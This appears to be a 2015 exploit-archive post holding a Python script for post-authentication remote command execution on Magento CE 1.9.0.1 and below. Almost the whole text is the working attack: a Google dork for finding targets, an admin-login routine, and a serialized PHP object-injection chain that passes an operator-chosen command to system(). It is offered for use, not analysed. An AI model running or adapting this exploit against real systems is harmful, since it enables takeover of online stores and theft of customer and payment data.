Magento CE Remote Command Execution
Posted on 20 August 2015
#!/usr/bin/python # Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE # Google Dork: "Powered by Magento" # Date: 08/18/2015 # Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com # Vendor Homepage: http://magento.com/ # Software Link: https://www.magentocommerce.com/download # Version: 1.9.0.1 and below # Tested on: Ubuntu 15 # CVE : none from hashlib import md5 import sys import re import base64 import mechanize def usage(): print "Usage: python %s <target> <argument> Example: python %s http://localhost "uname -a"" sys.exit() if len(sys.argv) != 3: usage() # Command-line args target = sys.argv[1] arg = sys.argv[2] # Config. username = '' password = '' php_function = 'system' # Note: we can only pass 1 argument to the function install_date = 'Sat, 15 Nov 2014 20:27:57 +0000' # This needs to be the exact date from /app/etc/local.xml # POP chain to pivot into call_user_exec payload = 'O:8:"Zend_Log":1:{s:11:"�0*�0_writers";a:2:{i:0;O:20:"Zend_Log_Writer_Mail":4:{s:16:' '"�0*�0_eventsToMail";a:3:{i:0;s:11:"EXTERMINATE";i:1;s:12:"EXTERMINATE!";i:2;s:15:"' 'EXTERMINATE!!!!";}s:22:"�0*�0_subjectPrependText";N;s:10:"�0*�0_layout";O:23:"' 'Zend_Config_Writer_Yaml":3:{s:15:"�0*�0_yamlEncoder";s:%d:"%s";s:17:"�0*�0' '_loadedSection";N;s:10:"�0*�0_config";O:13:"Varien_Object":1:{s:8:"�0*�0_data"' ';s:%d:"%s";}}s:8:"�0*�0_mail";O:9:"Zend_Mail":0:{}}i:1;i:2;}}' % (len(php_function), php_function, len(arg), arg) # Setup the mechanize browser and options br = mechanize.Browser() #br.set_proxies({"http": "localhost:8080"}) br.set_handle_robots(False) request = br.open(target) br.select_form(nr=0) br.form.new_control('text', 'login[username]', {'value': username}) # Had to manually add username control. br.form.fixup() br['login[username]'] = username br['login[password]'] = password br.method = "POST" request = br.submit() content = request.read() url = re.search("ajaxBlockUrl = '(.*)'", content) url = url.group(1) key = re.search("var FORM_KEY = '(.*)'", content) key = key.group(1) request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key) tunnel = re.search("src="(.*)?ga=", request.read()) tunnel = tunnel.group(1) payload = base64.b64encode(payload) gh = md5(payload + install_date).hexdigest() exploit = tunnel + '?ga=' + payload + '&h=' + gh try: request = br.open(exploit) except (mechanize.HTTPError, mechanize.URLError) as e: print e.read()
